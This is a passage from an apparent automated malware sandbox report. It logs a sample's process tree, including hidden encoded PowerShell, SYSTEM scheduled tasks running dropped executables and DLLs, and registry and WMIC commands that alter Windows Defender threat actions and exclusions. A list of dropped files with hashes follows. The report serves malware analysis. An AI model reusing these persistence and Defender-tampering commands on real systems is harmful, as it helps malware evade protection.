                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "gnmHZKShR"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1128
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 12:17:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\VUADlHc.exe\" GH /VStSdidyJ 385118 /S" /V1 /F
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3468
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                        PID:3932
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2724
                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5720
                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3596
                                                                                                                                                                                                                                                                            • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\VUADlHc.exe
                                                                                                                                                                                                                                                                              C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\VUADlHc.exe GH /VStSdidyJ 385118 /S
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                              PID:1208
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:2092
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:5620
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:2128
                                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:4424
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3560
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:1116
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:396
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:5608
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:6064
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:6088
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:5808
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:5028
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:2724
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                    PID:4924
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:6104
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5764
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:860
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5136
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:2040
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                              PID:2676
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                  PID:5188
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\Bsbkvm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:4548
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\fnRiWuS.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:1012
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /END /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:5144
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:5420
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\PypSJEG.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:5908
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\gwNbzRM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:3928
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\rQFuPsH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:540
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\hymlnQL.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:3372
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 14:54:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\HyGEAnkV\PuoEebg.dll\",#1 /TbdidIcur 385118" /V1 /F
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:4944
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /run /I /tn "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:5808
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:1316
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:3292
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\HyGEAnkV\PuoEebg.dll",#1 /TbdidIcur 385118
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5400
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\HyGEAnkV\PuoEebg.dll",#1 /TbdidIcur 385118
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                      PID:4072
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:5560

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\360\Total Security\config.ini
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      190B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      ced3f3d1b1ee172658d683cca992ef98

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      07fef9e7cb3fe374408b1bac16dbbfde029496e4

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6c6630ff0be4775eac74682d1fd4a0de91fc3cf6c6fdeae1c8e9019828c542f8

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      de2b3ec20ad19676172b7779cd3ed3a7fcaf2a490c01849c47ed5505f7a4b32c429f56c8a8c3009bf5290055bd3d3eec49762e9b60b728414fb6686a54b1f6ca

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\360\Total Security\i18n\i18n.ini
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      246B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      dfc82f7a034959dac18c530c1200b62c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9dd98389b8fd252124d7eaba9909652a1c164302

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      f421332fd132d8405cad34871425c9922e4a1b172d74f86b9e4e7ee750205919

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      0acb2a043303ab1c033313d62b9b4dad8ca240e345195c87776f99f129a93946036835872b336a8efd996657c37acf56da7c01d68add340408e8fce72fc66fe5

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\DroidCam\DroidCamApp.exe
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      942KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f8c12fc1b20887fdb70c7f02f0d7bfb3

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      28d18fd281e17c919f81eda3a2f0d8765f57049f

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.001.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      8d0dfb878717f45062204acbf1a1f54c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1175501fc0448ad267b31a10792b2469574e6c4a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.002.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      da104c1bbf61b5a31d566011f85ab03e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a05583d0f814685c4bb8bf16fd02449848efddc4

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.004.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f57ff98d974bc6b6d0df56263af5ca0d

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2786eb87cbe958495a0113f16f8c699935c74ef9

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.005.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7fb2e99c5a3f7a30ba91cb156ccc19b7

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.006.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      a49c8996d20dfb273d03d2d37babd574

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      96a93fd5aa1d5438217f17bffbc26e668d28feaf

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.007.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e65884abe6126db5839d7677be462aba

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      4f7057385928422dc8ec90c2fc3488201a0287a8

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.008.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f355305ada3929ac1294e6c38048b133

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a488065c32b92d9899b3125fb504d8a00d054e0e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.009.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      1d812d808b4fd7ca678ea93e2b059e17

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      c02b194f69cead015d47c0bad243a4441ec6d2cd

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

                                                                                                                                                                                                                                                                                                                                      SHA512

